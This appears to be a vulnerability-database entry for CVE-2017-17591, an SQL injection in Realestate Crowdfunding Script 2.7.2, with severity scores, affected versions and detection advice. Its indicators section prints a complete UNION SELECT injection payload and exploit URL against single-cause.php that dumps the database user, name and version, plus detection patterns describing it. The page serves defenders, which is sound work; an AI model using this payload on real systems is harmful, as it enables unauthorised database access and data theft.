cbcvebase.
CVE-2017-17591
published 2017-12-13

CVE-2017-17591: Realestate Crowdfunding Script 2.7.2 has SQL Injection via the single-cause.php pid parameter.

PriorityP260critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
4.37%
90.1th percentile
Realestate Crowdfunding Script 2.7.2 has SQL Injection via the single-cause.php pid parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
realestate_crowdfunding_script_projectrealestate_crowdfunding_script

Detection & IOCsextracted from sources · hover to see the quote

path/single-cause.php
command-23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+-
urlhttp://server/single-cause.php?pid=-23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+-
  • Monitor HTTP requests to single-cause.php where the 'pid' parameter contains SQL injection patterns, specifically UNION SELECT payloads with comment terminator '--+-' and negated numeric values prefixed with a single quote.
  • Detect use of CONCAT_WS with hex-encoded separator (0x203a20) in the pid parameter, which is used to exfiltrate USER(), DATABASE(), and VERSION() from the backend database.
  • Flag GET requests to single-cause.php containing UNION SELECT with 51 columns, characteristic of this specific exploit's fingerprint against Realestate Crowdfunding Script 2.7.2.
  • ·The exploit PoC uses a demo server (thavasu.com) and a generic 'localhost/[PATH]' placeholder; the actual deployment path of single-cause.php may vary per installation and should be confirmed before writing path-based detection rules.
  • ·The CVE was assigned N/A by the exploit author at time of submission; cross-reference with NVD entry CVE-2017-17591 to confirm scope before deploying signatures.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.